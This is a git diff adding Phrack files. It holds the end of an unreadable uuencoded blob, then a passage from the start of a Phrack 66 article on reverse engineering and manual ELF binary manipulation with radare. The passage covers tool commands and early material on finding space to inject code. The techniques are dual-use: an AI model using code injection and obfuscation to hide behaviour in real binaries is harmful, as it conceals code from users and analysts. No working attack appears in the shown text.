+M%NK1,ZHDSY1*\B*6"9-\+G/BVX%,2<GT8C_3B\XFZVMGVL&M?.EIQPJE25:N
+M/-_97'F6E2O/$R!7GF05H4](4H1.L\IJ)(0JJQ&55.'(EZ\RR=KBJ7J65BJ.
+MC3,673SMHI+-2O?JD:1FLUCX;E9+RV:Q@-HL2\]F<>X_9+;*^E4D]03['!UX
+MO'/E25:N--^57.DD*U>![V"N`LO*E>=[G2O/LG+E>5+DRG-9A(_8A]=:4QZC
+M^^__;>[^'UDS"NN_NKC_9R5I]O[?^WJ`\B#$'F#A#A+NH*?L#LI(=+6D-^(2
+MRL!<JYW`W_4%0&(G\*IV`L]Q;5##-^S\V#N!Q?+VC[B\+=*,M)3]-V<$D'K[
+M#\P^N1#_PS2$_W\E:>;]/_>+`)('(.X`$NL'8OW@Z=X!Q$<6$7<`+7\'T*#/
+MW6-2'D-#K@BBD072JP7"+-&90.JC>3"C5=P!M"WN`!)W`&6!K,T=0$2*E7HI
+MKHKLPP&Q9D4'4N:;E+1Z(,8CS"?B#B!Q!U`5)HO<`61H_"U`CWD'$,%D>@N0
+MB'OVH\4]$W<`B;1\NO_Y_\;B_YJZ5/#_&9*(_[N25.[_R[!Y<>]?MOH<!_^%
+MWT_X_83?;WF_W\'QAXD?KV<D;CQ.&@M7>9OR$W3C-7*!-C6[[5JSNS?3[.9]
+M@17N&7.F>Z:Q6[B)=Z6F.\9<-PDO?7]O8S>3+\UB-;$,:XP8-F)KC9C4O*SV
+M2LH5=T-D%7;BGJG&A+AX2@=^$0C%I-2<HD!`Z2\X`1Y`=IIUSY3>,#1QS^3=
+M@>OHGJ&>6KN.Q=13VZL=;)8*0'9+UA;2F!5L'Y:TNTGB550`40A-=DN<K"2N
+MQ8W+@,QRLO*N"(?W\?3]Q"G"O59>:=*[,B"$)G+]4HDV<ZF$>JVA*W:ERXK`
+M*.E,'@A6F7>RTN]5>&_EN[-6?B^Y5^OWHD19TN_%LWC7*&7QBOQ>/":R(HF[
+MKW_<"[&$WZO)M*#_IY\)]]7,_B]9+=G_I0G_STI2N?\GQ^;%/4!Y`#7[O\#B
+MO@:C6[B!A!M(N(&:<0.]Y]Q`>B]Q`V5$,G=3M")V<XG=7&(W5TUWUF\W5Z$[
+M_&ZNCJ+7FO>3W5QY'T%A-U?!3]"P+ZF1W5S4^VG4>C^5U>VALNN!*$]U#U7I
+M]*A6S(YK*<6-3=2-`%E#%E=Y*QB+\W[E=61Q\S0Q:FF2WRNWKC0Q]=J7ESSS
+MY=7,_D/,G-Q6G1]6>5)^V!7L/\RH[J]D[?'V'^8P,<7^0['_4/AAGW"ZO_^W
+MN?M?#:40_ULWA/]W):DB_E.&S_>)_I0%,)_[5X1^$J&?1.BGM0S]Q(ESE9`W
+M$O:)@[A609^^Z^M?27C,IQSQ:=K'THA/)8&=:MA8>:.FHBQXD6LA1-1R%[D2
+M+C5Z1Q()A$0"E\Z^%VLNPMVK4PR#AKO%XJN6!Z2J0H35>1AQDU-Q6R)B5J,7
+M0HF[<Q.PXN[<I>Y_;63_#SG_I8OX3X^49I[_NM_^GSP`<09,;/X1FW_6X@Q8
+M(923.`,FSH`UO##=V%ZFI=?9O^<S8+N50#JZ5%C-;9BPX@Q8"2;]'_<,F*'Q
+MI\#$&;#O\`P8L)@[!?:89\#(WH/I*3"Q]T#L/1![#^Z7EHC_T]3ZOZ87[O]4
+MR"/A_UE!JEC_'RR[_C^8M?Z?=_^(Q7^Q^"\6_]=R\7]0NO@_:'SQ?]#8XC]W
+M8^+LU4UNI:Y7MD*8;@F8+H1GX56O[].%=KF(07ZM=)Y=!#S6TY5$;I%,3A?0
+MBLM2S#/!]CRH\E9QK3^M6ZR:U)RV/"\MZQ9;.?8TNO2;V;S`>J3TDEJI]3S=
+MV$#73?4I-<B$1<"V?TZ-X\EJ)JW)ED=S[6BY[2(_M>1Y%GFU_%.5&]G-+/*R
+M=@J+O+)8Y,V/S^]^D;<F+:C_3Y@]O_8_6_\ON?]'4<7]KRM)%?H_Q^?[:/]\
+M]1+=GY\RA-(OE'ZA]#^RTO^OSH>]HZ-_ERG_$UDM%^]&%/\7[L#!`P0H@&:2
+M7G//:2<UNLGD_9_13:89Y#5/?PL&13OYK=(]4SQX):!<\:)%%\5X.<3FQ6M1
+MK.9H?*ZFV27U99KF#ZQGSJ%E+J1"\F*#;]VX44X3@(OP^;$5&9'NE98X_]=0
+M_'\9WF.%_9^Z:0C]?Q5I9ORW):._B=AO8ONGV/ZY1K'?\E<`B-AOR\5^:R8(
+M5E,Q\QO90RIBOQ5I(F*_98%\9['?2'>4>DRJ(F5GN[/\G:)-W,$A8K\5@30V
+M43<"9`U9+&*_B=AO54!$[+<B)BN/_<9'?GO<V&]\Y#>Q_UK<P2'V7S_55/#_
+M1J/QQ2@,;N^Z45-MS-C_H6HRB?^F2(:DRZ:L/Y-D75'%^?^5)!`ZMEP\NO/P
+M($:;^UO$][I+'FZ<!D[H7@;H=-QW0PN]#RW?#M#F^[,/%AX2MR.4VG@;LE(7
+M?9:][0=G)WN?MDDH(&R%]E77#B+L^C9\#E,7+?5*3I>6J=/1#K$58V2AZ"XB
+M>_[08.S3*$$D8I#K,$_@V0GU!)X!/.+2'1)G'I2]0S[&#G;0T,=C0,VUXXCX
+M>/T@1M9UX#KH^,O148<ZNMK$S3D$OB=N3NH'M=`H\.Z&03BZ<O^F_LL[TLX!
+M736G+=_@?D0<>W;@QY;K3]VG5AB[ML?<C^.18Q%?FN4[\(LL#[!S[G*P$Q=M
+M0HK#^!]1BGT<()"]:]K9``7$'0QU0T*$B>>9$BP:C\AS4@JZV/%<_QM#"&@7
+MXR%9SO.BI($/@?\/VE?/^ONN37J,0,@[5D1]E#B*2:$6S*L;77P;X]!'.`S]
+M@,S'-YABQAR=4#KQ,;)\LIA/24^KLF\;(1YYEHTOAK@%#V,`"!^6YU[Z2&FU
+MIKFO"?CDZW23`MD1FO8S'070;,JG#MV[``,"7W91,,)^&]E>0'SBS.=*$'&]
+MJ_'&2Z6-)/3V+>IM;'#M2-.64NC^>-@'(I.:4?R7L_%2;:..;&Q+'579?!F-
+MMBKJ)_4`UY$5`M9`MPCPHX2BH_D2QVS?A1O"2)L4XEK2TI9DHY&6(@Q#T\DU
+MQ6""8+&AV@^N*R#&[A`3N`X=+3"6*=@`7NO_0T2%-C!"FQ)%M9V@W$Z(U.UV
+MMTAKWE_AQDNC3;WJP.0HLBYQ:\-R*5FA(.OQIO1*6:BWC*\6)9ETJQY`HGP%
+M]-+.@_8!\PTK&F&/JF=D%-!?TKB6UOCF)P*=5ODEW1%#*]LWP!J]C33:,0!V
+M-1[T-R:@H',O=0J*#>JDD[1JII^JDO)9H=]2<'>^W:)L.0^@__$8Q(U,8\!.
+M_Y)"Z;N1Q]I3"4$=JO6DPY*2[AZC)6EI')%60GQ)PFZ%2"4+5/AVA&VR&F39
+M=A`ZI``!M/?^D!'SRONK?^=NI(24%=K[S$R0C.F0%J*/-C9(1YC&]E+:2*20
+MXD`*PYS0I_3S-DC`-ZG%#YC7!%@PVI!N%5F26=V]&^L;>P&<G'PD7"1;)\BR
+M'2_+=!ZZ@3YL)"U.9RQ2C&=5GW0HC]9COXL?(V7T/V=H[3Q`&RS(DUZE_]'_
+M$_W/T/^_O6MO3AM)XG]#E;_#++?)08*)'H"VC+U;3NPDKL07E\G6W97C4LD@
+M0!5>A41BUU;NLU]WSXPDA`0FBV4GGMZ4%XVD>?4\NG_3W3(@73?P<=:X@[HL
+MT2.7_Y;X+TSXMCD.-N*_9@'_ZW5-\3\7RN0__*X-ME/&&OU/JS?T&/^;J/^9
+MNK+_R87^X?7&:$1HO[5/C]OMPS?']LL_VSNA.4$R?:<8W$Q=?(,'<65_[10+
+M<]#/^EPC"AASA^[('0>V#\I."\7\-OR04KVXZ;-"@?&0KHFW42IKA6@/;OU"
+M3.N!K!M9T1R='J(&,"-#BD0^9/(P=;H7,*8N6V$^)*^!2-!Q.I!!63=^XX8/
+M")G)RGR34H)]-?=;<0O'^V;4'='2_#\%00NZVMUB&>OFOVZ:(?ZCF?5P_5?S
+M_^[I[/S#F_/#4WLZG1<.&`R`XM')>1MFYP&"!,634S0D@NL#5D-H$(>(#?^O
+M.6QWZ$_=HK3X_[7\\<-9Y<4(1D^M!UWESG[6&?-ST=+\1\!JY-H$6]2"ZVV,
+M^?7S7^[_IJ73_&_J#37_<R$"8N&?PWPTW>0;*^(A\['7X9LK'QWLRD$(#M'8
+MKNN@3>UD1#OQR<M3%LP<;XS(P0AM4#UGZ*O9_V/0TOS'17[+96RF_^LP_TWZ
+M_H_2_^Z>4ODO-_E;>WBLIC7KOZX9H?[7P(4?]3^U_N=#H<OF?N?*M4>]3FWP
+M>\R1<Q^/@R'5FR33@VY:VM"[6DPLU6J+D`)YKJ&FA]Z?Y5!G(Z-Z^@-2I=>M
+MLI0[SJP_3;WQC+GC+],*Z:(Q_8V-F&T[@7!WL&U6+A/H#.^B]E>I5$C#*T#[
+M,"1)^>FH*LI`U772*X\J56;J5:;!/_'L"_[5D\#ILRLOH)US^-6Y\9G.\/QT
+MUQ]XO2!24_$Y:%#'ZZ%3!*FI6!H=5]EPTQXY_N>ROK]OZE$!YR""T0GB5\>C
+MHYA0XX6-&29JI/)B7BBP458PD(.Y;V.T%)'7=`8=W2N7I`I]P)Y<?QJ7JFQ4
+M0S5;/"4`<`VNOOVT>JZB=$I=_[>,`:R5_QM6N/Y;IL[M/PRU_N=!0O]OXWY?
+MV",$`'\6WY^\/#\\_Z_MCJ[<;NQ&S8EC`K^6VT?OX%&\4WD!BW\'[LNEOZ`P
+M@8=/2_,?-^DMR7V2ULQ_P]`B^0^_!0/R?[.AXO_D0MS_-S_S+W)5C"3&SL#M
+M@L`82X)%!`2FQ30I;,:2R,I@Z2DN?L:DST71LU@4!DY0`AHY]F?.R!Z`I#4$
+M84RN<*UB))ZBY1B(E<4"OM#W0,YB\+=%UW1%_X=K?(/+7U7VK.L$3HLE1-$+
+M_3)+&I7"*+<+&;@S%^5*,ED`86[28<*Z`;+$K$&,*V-YSRKB/KTOWGXEC.C&
+MK'UVS/JSR7S*S6=Z4![4G1U0X[FMG4WWR^U7;X^/[`\?WQZ?5[6J7JFP@P.R
+MEZ.F,]83<B1T,'1[E962.:#-QV2VQYYT2;HDWD"%X%6*(G'\GY./]NO#D_=_
+MGA]C\K<BKP]U*KX/4O`UP]I5V#[3J=3"4J%M;MG6G;@^6BB1(Z_#T(T<@2=H
+M;8VQDW^.0`QWOD!*#:J"A14RJR"EXR/L4V$,M"<EY'+\5*K"L-_QO=&%=DFR
+M,S)A^9&6:!FU+=G9P0!%=6IGE3T5HRU>4DRAJ;"G6%25V("F/ZB!A'QA"UW$
+M4ADC2LO@3':O8!:H=Y2%'O94#FM-#K%_#V[0Z)"A*=,?-+A@7/LC&-&V_64R
+M=`*0''%XE_"!$MNC_THC6#)F-R7*)-0XBM^41'"_E-S_=X'M]X?_-4V0!@C_
+M,Q7^EPNE\G_+-D`;\-\P+#S_:>B6IOB?!ZWD_Y9L@-;I_X9N)?C?U#6E_^="
+MTO[GK7UX='0>V?W(ZRCE7^<V"%DG1VUF9)@!D9_%,S;T@\G,O?CMLA6E79T%
+M,[PD.1GM@M#4!N4H.W@,5C8/EU+G?\[XGZ&'^K^EFQ;A?YKZ_D<NA-8^PMCG
+M!;!>ES\,ME.,V0:Q@D0`W9TX`$A&0/!WY/F=,`_Z4W/"K.A/S=E982RD9OX]
+M4>K\%YS.Z?RW7C>-</^WF@:=_QK*_C<7NF?\;QG82\/_(`T7F`3<Y_7'SC`)
+M`<X0^ED'"Z:@AQLAA;B^M=8]8<2`1,:1Q.)?">30OPBEJDN!(GH'&OPB$V80
+MF^:]GCM#R(3+2I`D@"K7C[`F_A0[$'"@3;`B@H)5J\(R0*,(,XJ_Q/0UJ)DH
+M,:Q$LE!Q<,YK6]F\?&,M:C=R1[X;B#;3T3Q'/PO`^\[TAH5W2FWI5E>KU2A3
+M0J\^S&="9IW/A-N>;,SN[RBF0I-DM\=O8<O@%A26`/G\"^TR'>C3$#V#H2)1
+MO%M@>:N@/)V#>0++6POE+=917UU'8TMU-#:K(W'D"/4+Z78HG3*A(!Y`$<:&
+M,V2D4A"WT!RBC).$>?OAY(&+Y\\K4$Z,84(-\63#^VY@#WW9']ZEA#-?0X:N
+MTQD08"Z:L:8@[`P$0N/F&>A*P":]'@Q.Z1B>K'KAZP!#LI=_P>H@K&I/YH$]
+MNII<QVH%70V\XTZ/W2[EP^%2=!QWAO,PLJ0P*^DL%//%FP5SN(J[PV;TRG/>
+M+60^DE(/Y)I$R+%GGF#L3)\*(_L3)Y!0N;>$EJ>5%V/X&P\!>G*YA\<QNJIH
+MT<*T#/L_WOV"S012DPV--TY4O$J'([$Z1+`U=CXV12/X6MC2N-TJV=G`(D'%
+MKN61)GF$JS7L-_T^K;V9?:GQD2::HZ<,)R;&TRD/.BN6<V+=RH;JE/%BV_15
+M;=MD`-ZB90M,?8>NZ&3R1%/(O\5DQ8P_PVOQ-K5/WKP[>?]^>V<-<@RCWS"+
+M(K]^*CWQ/Y5H_/+^?J0'$ZGR_Y9]`-;J_Z'_7].H-TS$_ZRZ.O_/A>[*_A]D
+MQ`[N1,.;*@]5(7+!HL9%M^L%42`4MLM&WIB"-W=Q1W-XO!.T@+R:]WO>-2SB
+MCV0ZYDZI\W_+/@#KYG]T_M.P-`OU_[H)2X(Z_\F!,OE/P-UVRMC@_,_4=([_
+M&HK_N=!J_A-P^[=1P#7SWP#6A_M_@_P_FNK[?SG1:H^."'B[G4^(0-\2_A^I
+M+B#R6!'U$WLRYHX0U^B+G^(@<5UIL51?A_&-\'58--G;*>)YY"*(MA,#T3J^
+M.(^,I<CC2739.&!ZE<G2\6I_'Z[D$_22P(,2B-=SO5%Y6OX?_.6^%=G0'+/P
+MD4*'QVU?#:.)9V,>'5S5RU#(%[5QJ=Y([Y*V.Z9`<Z@0D1,)LI/W=ZC@<14Z
+M^>8Y5YX2NCH)@F%FU+/8+[)G*W@,Q!DG55AJC'2ZZ?C)"E,6U:B7B1.1$TYA
+M8<1()D6U7$!E%AJY5`G^PJN!,^[S5@EV!9,)?VNQNU<ICSL2@(SP1U+G/>X+
+M-')+"0Y`)?'#*:$;SW0>@9J\^SL"D*S2K^_HB</N%\]WE_LAP>R8Y]')&*&X
+M`*&KR92"S/%7I[-)!^$DBC>'*CLTB.='B$(9;3:_*?>A'Y!6[__;,018J_]K
+MH?^/!<(`[O_-IJ;V_SQ(GO'[>,:_1V"?L;/H_0/;D[B!9_CB\+^0X?VSG$@"
+M1.SP/\4M2"T;]T:KYK]^G_J?LO_,A5;S/__U7[=TOOZK^-^Y4,KZKV>M_[I:
+M_W\Z6CW_B>EWCO\8C4:(_YB61OA/7=E_YD(*__EA\1_MCO&?'Q/^H>`I,2PG
+M!%CZ,:NQ9(G?#;0D&+(:(<J"FS@7,LW7F#OTE^"C!;1*?!D#,:IT/&FIN<(L
+M1[]4X-+CIH7]'[_',K&_3F;#[CW%_VXT&RC_UQL8_T7I?W=/F?S?H@_0>OVO
+M*?BO@?IOD?]?4\E_N1!%^]WCP7Y?O7Y_^(:N=OL+SC^0PH<&7!3C&J-,CX<*
+MYIF]"&^H4,$/F3+G_Q9M@#98_W6K0?[?9EW9?^1"*_F_I3U@W?JO6T:X_AOT
+M_;^FI?"_?"AK-1=[`6T%BVA@[*E8,+@UL>#4FO]`:>7\CQC]MS#`=?/?C.(_
+M:G43\3^K;JGX#[G0@_/_C,(09R".J5Z5$H9YBR.6G0UF3N?S+\*7\/$Y=6Q`
+MF?,_%/CO'/_7&O5(_JL;W/X#Q$`U_W.@!S?_(__OE0[6X=:T%*X1EX,H'.-R
+MK$:1D.T.&V:=XA/+*JTH1!Y;BI&G_W!>9`OSGY99.H?8:@BXC?2_ILG]/YI*
+M_\N#LOB_S1!`WX'_:>K[7_F0PO\>-V7-_VVZ`&ZV_C=5_,<<:17_M[4'?`?^
+MU]24_U<NI/"_QTVKYO^6X+^U\]^R(OP/'3]@03!-=?Z;"STX_7\]_I<6VBT-
+M$Q3F?R+(D(Y6:3PI\=V$Q(/&;1\TLQ^,`,E/X\,AF>C!RGDFPAT=AM'3HH]0
+MRTS]RAY[,N7_T'Q,UE[^,.0/DT<5FKEN63Z#)<<3C&2"N0Q/9,W_+<)_&^%_
+E3?K^2[.AJ?._7.C!S7^%_RE2I$B1(D6*%-TI_1]!W`^D`+@!````
+`
+end
+
+--------[ EOF
diff --git a/phrack66/14.txt b/phrack66/14.txt
new file mode 100644
index 0000000..b5ad567
--- /dev/null
+++ b/phrack66/14.txt
@@ -0,0 +1,2849 @@
+				==Phrack Inc.==
+
+		Volume 0x0d, Issue 0x42, Phile #0x0E of 0x11
+
+|=-----------------------------------------------------------------------=|
+|=-----------------=[ manual binary mangling with radare ]=--------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------=[ by pancake <at> nopcode.org> ]=-----------------=|
+|=-----------------------------------------------------------------------=|
+
+  1 - Introduction
+    1.1 - The framework
+    1.2 - First steps
+    1.3 - Base conversions
+    1.4 - The target
+  
+  2 - Injecting code in ELF
+    2.1 - Resolving register based branches
+    2.2 - Resizing data section
+    2.3 - Basics on code injection
+    2.4 - Mmap trampoline
+        2.4.1 - Call trampoline
+        2.4.2 - Extending trampolines
+  
+  3 - Protections and manipulations
+    3.1 - Trashing the ELF header
+    3.2 - Source level watermarks
+    3.3 - Ciphering .data section
+    3.4 - Finding differences in binaries
+    3.5 - Removing library dependencies
+    3.6 - Syscall obfuscation
+    3.7 - Replacing library symbols
+    3.8 - Checksumming
+  
+  4 - Playing with code references
+    4.1 - Finding xrefs
+    4.2 - Blind code references
+    4.3 - Graphing xrefs
+    4.4 - Randomizing xrefs
+  
+  5 - Conclusion
+  6 - Future work
+  7 - References
+  8 - Greetings
+
+
+--[ 1 - Introduction
+
+Reverse engineering is something usually related to w32 environments where
+there is lot of non-free software and where the use of protections is more
+extended to enforce evaluation time periods or protect intellectual (?)
+property, using binary packing and code obfuscation techniques.
+
+These kind of protections are also used by viruses and worms to evade
+anti-virus engines in order to detect sandboxes. This makes reverse
+engineering a double-edged sword.
+
+The way to do low level analysis does usually involve the development and
+use of a lot of small specific utilities to gather information about the
+contents of firmware or a disk image to carve for keywords and dump its
+blocks.
+
+Actually we have a wide variety of software and hardware platforms and
+reverse engineering tools should reflect this.
+
+Obviously, reverse engineering, cracking and such are not only related to
+legal tasks. Crackmes, hacking challenges and learning for the heck of it
+are also good reasons to play with binaries. For us, there is a simple
+reason behind them all: fun.
+
+
+--[ 1.1 - The framework
+
+At this point, we can imagine a framework that combines some of the basics
+of *nix, offering a set of actions over an abstracted IO layer.
+
+Following these premises I started to write a block based hexadecimal
+editor.  It allows to seamlessly open a disc device, file, socket, serial
+or process.  You can then both automatize processing actions by scripts and
+perform manual interactive analysis.
+
+The framework is composed of various small utilities that can be easily
+integrated between them by using pipes, files or an API:
+
+  radare: the entrypoint for everything :)
+  rahash: block based hashing utility
+  radiff: multiple binary diffing algorithms
+  rabin:  extract information from binaries (ELF,MZ,CLASS,MACH0..)
+  rasc:   shellcode construction helper
+  rasm:   commandline assembler/disassembler
+  rax:    inline multiple base converter
+  xrefs:  blind search for relative code references
+
+The magic of radare resides in the ortogonality of commands and metadata
+which makes easy to implement automatizations.
+
+Radare comes with a native debugger that works on many os/arches and offers
+many interesting commands to ease the analysis of binaries without having
+the source. 
+
+Another interesting feature is supporting high level scripting languages
+like python, ruby or lua. Thanks to a remote protocol that abstracts the
+IO, it is allowed the use of immunity debugger, IDA, gdb, bochs, vmware and
+many other debugging backends only writing a few lines of script or even
+using the remote GDB protocol.
+
+In this article I will introduce various topics. It is impossible to
+explain everything in a single article.
+
+If you want to learn more about it I recommend you to pull the latest hg 
+tip and read the online documentation at:
+
+  http://www.radare.org [0]
+
+I have also written a book [1] in pdf and html available at:
+
+  http://www.radare.org/get/radare.pdf
+
+
+--[ 1.2 - First steps
+
+To ease the reading of the article I will first introduce the use of radare
+with some of its basics.
+
+Before running radare I recommend to setup the ~/.radarerc with this:
+
+  e scr.color=1    ; enable color screen
+  e file.id=1      ; identify files when opened
+  e file.flag=1    ; automatically add bookmarks (flags) to syms, strings..
+  e file.analyze=1 ; perform basic code analysis
+
+Here's a list of points that will help us to better understand how radare
+commands are built.
+
+ - each command is identified by a single letter
+   - subcommands are just concatenated characters
+ - e command stands for eval and is used to define configuration variables
+ - comments are defined with a ";" char
+
+This command syntax offers a flexible input CLI that allows to perform
+temporal seeks, repeat commands multiple times, iterate over file flags,
+use real system pipes and much more.
+
+Here are some examples of commands:
+
+  pdf @@ sym.    ; run "pdf" (print disassembled function) over all
+                 ; flags matching "sym."
+  wx cc @@.file  ; write 0xCC at every offset specified in file
+  . script       ; interpret file as radare commands
+  b 128          ; set block size to 128 bytes
+  b 1M           ; any math expression is valid here (hex, dec, flags, ..)
+  x @ eip        ; dump "block size" bytes (see b command) at eip
+  pd | grep call ; disassemble blocksize bytes and pipe to system's grep
+  pd~call        ; same as previous but using internal grep
+  pd~call[0]     ; get column 0 (offset) after grepping calls in disasm
+  3!step         ; run 3 steps (system is handled by the wrapped IO)
+  !!ls           ; run system command
+  f* > flags.txt ; dump all flags as radare commands into a file
+
+--[ 1.3 - Base conversions
+
+rax is an utility that converts values between bases. Given an hexadecimal
+value it returns the decimal conversion and viceversa.
+
+It is also possible to convert raw streams or hexpair strings into
+printable C-like strings using the -s parameter:
+
+  $ rax -h
+  Usage: rax [-] | [-s] [-e] [int|0x|Fx|.f|.o] [...]
+   int   ->  hex           ;  rax 10
+   hex   ->  int           ;  rax 0xa
+   -int  ->  hex           ;  rax -77
+   -hex  ->  int           ;  rax 0xffffffb3
+   float ->  hex           ;  rax 3.33f
+   hex   ->  float         ;  rax Fx40551ed8
+   oct   ->  hex           ;  rax 035
+   hex   ->  oct           ;  rax Ox12 (O is a letter)
+   bin   ->  hex           ;  rax 1100011b
+   hex   ->  bin           ;  rax Bx63
+   -e    swap endianness   ;  rax -e 0x33
+   -s    swap hex to bin   ;  rax -s 43 4a 50
+   -     read data from stdin until eof
+
+With it we can convert a raw file into a list of hexpairs:
+
+  $ cat /bin/true | rax -
+
+There is an inverse operation for every input format, so we can do
+things like this:
+
+  $ cat /bin/true | rax - | rax -s - > /tmp/true
+  $ md5sum /bin/true /tmp/true
+  20c1598b2f8a9dc44c07de2f21bcc5a6 /bin/true
+  20c1598b2f8a9dc44c07de2f21bcc5a6 /tmp/true
+
+rax(1) can be also used in interactive mode by reading lines from stdin.
+
+
+--[ 1.4 - The target
+
+This article aims to explain some practical cases where an scriptable
+hexadecimal editor can trivially solve and provide new perspectives to
+solve reverse engineering quests.
+
+We will take a x86 [2] GNU/Linux ELF [3] binary as a main target. Radare
+supports many architectures (ppc, arm, mips, java, msil..) and operating
+systems (osx, gnu/ linux, solaris, w32, wine, bsd), You should take in mind
+that commands and debugger features explained in this article can be
+applied to any other platform than gnu/linux-x86.
+
+In this article we will focus on the most widely-known platform
+(gnu/linux-x86) to ease the reading.
+
+Our victim will suffer various manipulation stages to make reverse
+engineering harder keeping functionality intact.
+
+The assembly snippets are written in AT&T syntax [4], which I think it's
+more coherent than Intel so you will have to use GAS, which is a nice multi
+architecture assembler.
+
+Radare2 has a full API with pluggable backends to assemble and disassemble
+for many architectures supporting labels and some basic assembler
+directives. This is done in 'rasm2' which is a reimplementation of rasm
+using libr.
+
+However, this article covers the more stable radare1 and will only use the
+'rasm' command to assemble simple instructions instead of complete
+snippets.
+
+The article exposes multiple situations where low level analysis and
+metadata processing will help us to transform part of the program or simply
+obtain information from a binary blob.
+
+Usually the best program to start learning radare is the GNU 'true', which
+can be completely replaced with two asm instructions, leaving the rest of
+the code to play with. However it is not a valid target for this article,
+because we are interested in looking for complex constructions to hide
+control flow with call trampolines, checksumming artifacts, ciphered code,
+relocations, syscall obfuscation, etc.
+
+
+--[ 2 - Injecting code in ELF
+
+The first question that pops up in our minds is: How the hell we will add
+more code in an already compiled program?
+
+What real packers do is to load the entire program structures in memory for
+in-memory manipulation, handling all the code relocations and generating a
+completely brand new executable.
+
+Program transformation is not an easy task. It requires a complete analysis
+which sometimes is impossible to do automatically, due to the need to mix
+the results of static, dynamic and manual code analysis.
+
+Instead of this approach, we will do it in a bottom to top way, taking low
+level code structures as units and doing transformations without the need
+to understand the whole program.
+
+This enables ensuring that transformations won't break the program in any
+way because their local and internal dependencies will be easy identified.
+
+Because the target program is generated by a compiler we can make some
+assumptions.  For instance, there will be a place to inject code, the
+functions will be sequentially defined, access to variables will be 
+easier to track and calling conventions will be the same along all the
+program.
+
+Our first action will be to find and identify all the parts of the text
+section with unused or noppable code.
+
+'noppable' code is defined as code that is never executed, or that can be
+replaced by a smaller implementation, taking benefit of the non-overwritten
+bytes.
+
+Compiler-related stubs can be sometimes noppable or replaced, and more of
+this is found in non-C native-compiled programs (haskell, C++, ...)
+
+The spaces between functions where no code is executed are called 'function
+paddings'.  They exist because the compiler tried to optimize the position
+of the functions at aligned addresses to ease to job on the cpu.
+
+Some other compiler-related optimizations will inline the same piece of
+code multiple times. By identifying such patterns, we can patch the
+spaghetti code into a single loop with an end branch and use the rest for
+our own purposes.
+
+Following paragraphs will verbosely explain those situations.
+
+Never executed code:
+
+  We can find this code by doing many execution traces of the program and
+  finding the uncovered ranges. This option will probably require human
+  interaction.
+
+  Using static code analysis we would not be able to follow runtime pointer
+  calculations or call tables. Therefore, this method will also require some
+  human interaction and, in the event we get to identify a pattern, we can
+  write a script to automatize this task and add N code xrefs from a single
+  source address.
+
+  We can also emulate some parts to resolve register values before reaching
+  a register based call/branch instruction.
+
+Inlined code and unrolled loops:
+
+  Programmers and compilers usually prefer to inline (duplicate the code of
+  a external function in the middle of another one) to reduce the execution
+  cost of a 'call' instruction.
+
+  Loops are also unrolled and this produces longer, but more optimal code
+  because the cpu doesn't need to compute unnecessary branches all the
+  time.
+
+  These are common speedup practices, and they are a good target to place
+  our code. This process is done in four steps:
+
+  - Find/identify inline code or unrolled loops (repeated similar blocks)
+  - Patch to uninline or re-roll the loop
+  - ...
+  - Profit!
+
+  Radare provides different commands to help to find/identify such kind of
+  code blocks. The related commands are not going to do all the job
+  automatically. They require some automatization, scripting or manual
+  interaction.
+
+  The basic approach to identify such kind of code is by finding repeated
+  sequences of bytes allowing a percentage of similarity. Most inline code
+  will come from small functions and unrolled loops will be probably small
+  too.
+
+  There are two basic search commands that can help on this:
+
+  [0xB7F13810]> /?
+  ...
+  /p len   ; search pattern of length 'len'
+  /P count ; search patterns of size $$b matching at >N bytes of curblock
+  ...
+
+  The first command (/p) will find repeated bytes of a specified length.
+  The other one (/P) will find a block that matches at least N bytes of the
+  current blocksize compared to the current one.
+
+  These pattern search must be restricted to certain ranges, like the .text
+  section or the function boundaries:
+
+  The search should be restricted to the text section:
+   > e search.from = section._text
+   > e search.to = section._text_end
+
+  All search commands (/) can be configured by the 'search.' eval
+  variables.
+
+  The 'section.' flag names are defined by 'rabin'. Calling rabin with
+  the -r flag will dump the binary information to stdout as radare commands.
+
+  This is done at radare startup when file.id and file.flag are enabled,
+  but this information can be reimported from the shell by calling:
+
+   > .!!rabin -rS ${FILE}
+
+  This command can be understood as a dot command '.', which interprets the
+  output of the following command '!' as radare commands. In the example
+  below there are two admiration marks (!!). This is because the single '!'
+  will run the command through the io subsystem of radare, falling in the
+  debugger layer if trying to run a program in the shell which has a name
+  that equals a debugger command's.
+
+  The double '!!' is used to directly escape from the io subsystem and run
+  the program directly in the system.
+
+  This command can be used to externalize some scripting facilities by
+  running other programs, processing data, and feeding radare's core back
+  with dynamically generated commands.
+
+  Once all the inlined code is identified, search hits should be analyzed,
+  discarding false positives and making all those blocks work as subroutines
+  using a call/ret pattern, nopping the rest of the bytes. Unused bytes can
+  now be filled with any code.
+
+  Another way to identify inlined code can be done by splitting a function
+  code analysis into basic blocks without splitting nodes (e
+  graph.split=false) and finding similar basic blocks or repeated.
+
+  Unrolled loops are based on repeated sequences of code with small
+  variations based on the iterator variable which must change along the
+  repeated blocks in a progressive way (incremental, decremental, etc).
+
+  Language bindings are recommended for implementing such kind of tasks,
+  not only because the higher language representation, but also thanks to
+  the high level APIs for code analysis that are distributed with radare
+  for python and other scripting languages (perl, ruby, lua).
+
+  The '/' command is used to perform searches. A radare command can be
+  defined to be executed every time a hit is found, or we can later use
+  the '@@' foreach iterator can be used over all the flags prefixed with
+  'hit0' later.
+
+  See '/?' for help on search-related commands but, in short, there are
+  commands to search in plain text, hexadecimal, apply binary masks to
+  keywords, launch multiple keywords at a time, define keywords in a file,
+  search+replace, and more.
+
+  One of the search algorithms accessible through the '/' command is called
+  '/p', which performs a pattern search. The command accepts a numeric value
+  which determines the minimum size for a pattern to be resolved.
+
+  Patterns are identified by a series of consecutive bytes, with a minimum
+  length, that appear more than once. The output will return a pattern id,
+  the pattern bytes and a list of offsets where the pattern is found.
+
+  This kind of search algorithm can be useful for analyzing huge binary
+  files like firmwares, disc images or uncompressed pictures.
+
+  In order to get a global overview of a big file the 'pO' command can be
+  used, which will display the full file represented in 'blocksize' bytes
+  in hexadecimal. Each byte will represent the number of printable
+  characters in the block, the entropy calculation, the number of
+  functions identified there, the number of executed opcodes, or whatever
+  is set at the 'zoom.byte' eval variable.
+
+      zoom view                  real file
+    +-----------+              +----------+
+    |         0 |--------------|        0 |
+    |         1 | '-.__        |      ... |
+    |         2 |      '-.__   |          |
+    |         3 |           '-.|      128 | (filesize/blocksize)
+    |       ... |              +----------+
+
+  The number of bytes of the real file represented in a byte of the
+  zoom view is the quotient between the filesize and the blocksize.
+
+Function padding and preludes:
+
